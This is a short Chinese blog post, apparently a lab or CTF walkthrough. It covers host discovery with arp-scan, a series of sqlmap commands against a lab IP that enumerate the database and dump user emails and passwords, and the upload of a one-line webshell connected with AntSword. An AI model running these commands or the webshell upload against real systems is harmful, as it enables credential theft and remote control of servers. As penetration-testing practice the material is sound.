本文详细记录了一次渗透测试的过程,从主机发现(使用arp-scan和端口扫描)到利用SQL注入(sqlmap工具)获取数据库信息,再到发现并利用文件上传漏洞。通过在目标网站的搜索框进行SQL注入,成功爆库、表、列,并获取了用户名和密码。此外,还揭示了网站存在文件上传漏洞,允许上传木马文件并实现远程连接。
0x00 前言
难度:高
工具:sqlmap、kali
思路总结:
0x01 过程
1、主机发现
扫主机:sudo arp-scan ip/24
扫端口(一般实际中,有22端口,会尝试破解一下弱口令)
2、渗透
有80端口开放,访问 。一个登录框,抓包查看,正常来说,邮箱和密码都没加密,也没验证码,实际测试中可以结合其他方法尝试弱口令或者暴破。但是这里毫无其他数据的登录框不太好暴破用户邮箱加密码。
而且提供了注册功能,现在只是为了进去这个系统,不是搞渗透挖漏洞,所以注册一个就好了
进去之后这样,闲的没事别试xss了。。。。。。我试了一把存储xss,重新注册了个号。。。。。。。。。。点一下弹一次。
测试一下,网站搜索框有sql、文件上传漏洞。
(1)sql注入
先试一下sql,搜索框输入特殊字符报sql错误,or 1=1--+绕过,存在数字型sql注入。上sqlmap。
sudo sqlmap -u "http://172.20.10.5/search.php?location=emails&query=1"
爆库名
sudo sqlmap -u "http://172.20.10.5/search.php?location=emails&query=1" --dbs --batch
爆表名
sudo sqlmap -u "http://172.20.10.5/search.php?location=emails&query=1" -D socialnetwork --tables -batch
爆列
sudo sqlmap -u "http://172.20.10.5/search.php?location=emails&query=1" -D socialnetwork --tables -T users --columns -batch
爆字段
sudo sqlmap -u "http://172.20.10.5/search.php?location=emails&query=1" -D socialnetwork --tables -T users -C user_email,user_password -batch --dump
拿到了登陆名和密码。
(2)文件上传
进入个人中心,左下角的地方存在上传漏洞,传一个木马(简单的一句话就行,不需要免杀)
上传的文件右键就有地址链接,然后蚁剑连接。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
